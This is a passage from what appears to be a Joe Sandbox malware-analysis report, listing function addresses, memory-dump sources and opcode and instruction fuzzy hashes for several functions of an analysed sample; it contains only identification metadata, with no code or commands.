                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 906187d25550cfeee7b11dba66d901c87d71b6414b1ff696d9f07e7faa0205c6
                • Instruction ID: da6229f956f5c8891f7fcbc9cd1e899ea24c6615797dcdf620ff53c772fb33d6
                • Opcode Fuzzy Hash: 906187d25550cfeee7b11dba66d901c87d71b6414b1ff696d9f07e7faa0205c6
                • Instruction Fuzzy Hash: 56D05E35B44218CFCB16E6A8E468DF83F67DF8D72174000A6D34DCB2A5DA215905AF51
                Function 057EB800 Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 98219795a936ee97bca9f6fda82949487029daf126f635046e1fe7fd8d5c4aa5
                • Instruction ID: 24311fd4e2f7d36a045a7d0b0235a222b305da67054523ce3c1bdb914ca2bee5
                • Opcode Fuzzy Hash: 98219795a936ee97bca9f6fda82949487029daf126f635046e1fe7fd8d5c4aa5
                • Instruction Fuzzy Hash: 2CD02B30B4021C8F9F25D7A8D054CF83FA2EB8C311B0080B2C20DCB365CA205900A3C0
                Function 057EBC09 Relevance: .0, Instructions: 17COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dda50c2312d8d8119e0037e9c0e0c14dc4a43101b7a367a90857b36e92014aa9
                • Instruction ID: d068600cc06aaf6298a1ad7e50e92f7c1021bf633eb93066c09241618700ae02
                • Opcode Fuzzy Hash: dda50c2312d8d8119e0037e9c0e0c14dc4a43101b7a367a90857b36e92014aa9
                • Instruction Fuzzy Hash: C6D0A7347901188FCB01DBACE428DE93FB5DF8932574100F1D218DB736C6219A149750
                Function 057EAE60 Relevance: .0, Instructions: 16COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c961790a3ffd850c1fda2b9682a0cbbcecf8e8d7cac18c30b47e15cf89275755
                • Instruction ID: fcef818a218189fc29b47f1a323a22fbcf62a123500b2ea49c7e1e4b964bb7bc
                • Opcode Fuzzy Hash: c961790a3ffd850c1fda2b9682a0cbbcecf8e8d7cac18c30b47e15cf89275755
                • Instruction Fuzzy Hash: B3D0A722B0C7E497CB13651D6C1909A7F5D5FC6922B084096E409C7107D810581263F6
                Function 057EB4A1 Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28ff717f4db3e28bf0dbdd0684e1621108ec6eaabbfebbcfd8c9b378a462e1ae
                • Instruction ID: 93160a484ecafef776749b08bbbdf3f9b263645db7b30b653ddb5014f46cef99
                • Opcode Fuzzy Hash: 28ff717f4db3e28bf0dbdd0684e1621108ec6eaabbfebbcfd8c9b378a462e1ae
                • Instruction Fuzzy Hash: 03D0C935B400288F8B48DBACE5544EDBFF6EF88315B5100BAE20ACB624DB30D9108B51
                Function 057EC0D8 Relevance: .0, Instructions: 13COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6de09ebcf51c5d9f4d198333fa7fa549199a62450f45a8d3706e64b0427a2904
                • Instruction ID: f33494497263a7de87bd0418e9fc97cbdbb38122af9404392ef204907c07e127
                • Opcode Fuzzy Hash: 6de09ebcf51c5d9f4d198333fa7fa549199a62450f45a8d3706e64b0427a2904
                • Instruction Fuzzy Hash: AAD012323043418FCF069B18E46A788B7A1EF81328B4940B5E046CFB52C726CC83C740
                Function 057EB674 Relevance: .0, Instructions: 13COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ecbd9c89c62a18af293aadc52349a6a86fbb4fdc8c5636656be2a14a8da41ec0
                • Instruction ID: ddfaf66a499276aa1b30cd4b5c87a4825571df943d3e32a964e967b051c37e26
                • Opcode Fuzzy Hash: ecbd9c89c62a18af293aadc52349a6a86fbb4fdc8c5636656be2a14a8da41ec0
                • Instruction Fuzzy Hash: BAD0C9357400148F8604DAACD4544A87BA6EF8831574100AAE20AC7634CA209C518780